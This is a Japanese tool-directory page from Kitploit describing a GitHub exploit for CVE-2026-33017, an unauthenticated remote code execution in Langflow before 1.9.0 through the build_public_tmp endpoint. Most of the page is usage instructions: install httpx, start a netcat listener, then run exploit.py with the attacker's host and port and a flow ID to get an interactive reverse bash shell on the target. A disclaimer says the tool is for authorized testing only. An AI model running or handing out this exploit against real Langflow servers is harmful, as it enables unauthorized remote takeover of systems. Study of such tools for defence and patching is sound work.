Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-33017-Exploit — Langflow <1.9.0 の build_public_tmp エンドポイントを介した認証されていないリモートコード実行のエクスプロイト。許可された侵入テスト用にリバースシェルを配信します。 | Kitploit
ツール/GitHubGitHub/diamorphine666/cve-2026-33017-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツール
GitHubdiamorphine666/cve-2026-33017-exploit

CVE-2026-33017-Exploit

Langflow <1.9.0 の build_public_tmp エンドポイントを介した認証されていないリモートコード実行のエクスプロイト。許可された侵入テスト用にリバースシェルを配信します。

リポジトリを見る
22ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Fireflow RCE Exploit

build_public_tmp エンドポイントを介した Langflow のリモートコード実行 (RCE)。
ターゲット上でリバースシェルを実行する Public Flow Build エンドポイントを介したエクスプロイト。

必要条件

  • Python 3.8+
  • httpx ライブラリ

インストール:

root@kitploit:~
pip install httpx

使用方法

root@kitploit:~
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>

引数

  • -u, --url : Langflow インスタンスのベース URL (例: https://flow.example.com/)
  • -l, --lhost : リバースシェルを受信するあなたの IP アドレス
  • : リバースシェルの待受ポート
-p, --lport
  • -f --flow-id : 対象フロー ID (必須 – /api/v1/flows/ または UI から取得)
  • -c --client-id : セッション識別用の client_id クッキー値
  • 例

    1. リスナーを起動します:

      root@kitploit:~
      nc -nlvp 9001
      
    2. エクスプロイトを実行します:

      root@kitploit:~
      python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
      
    3. 成功すると、対話型の bash シェルが取得できます。

    重要な注意事項

    • ReadTimeout は正常です – シェルが HTTP リクエストをブロックするため、サーバーが応答しない場合があります。リスナーで接続が確認できれば、エクスプロイトは成功しています。
    • 有効な flow-id が必要です。GET /api/v1/flows で全フローを一覧表示するか、ブラウザの URL からコピーしてください。
    • このツールは、許可されたペネトレーションテストおよび教育目的専用です。明示的な許可なくシステムに対して使用しないでください。

    影響を受けるバージョン

    • カスタムコンポーネント RCE の修正前の Langflow バージョン <1.9.0

    ライセンス

    MIT – 教育および倫理的なセキュリティ研究のためのものです。

    ツールをダウンロード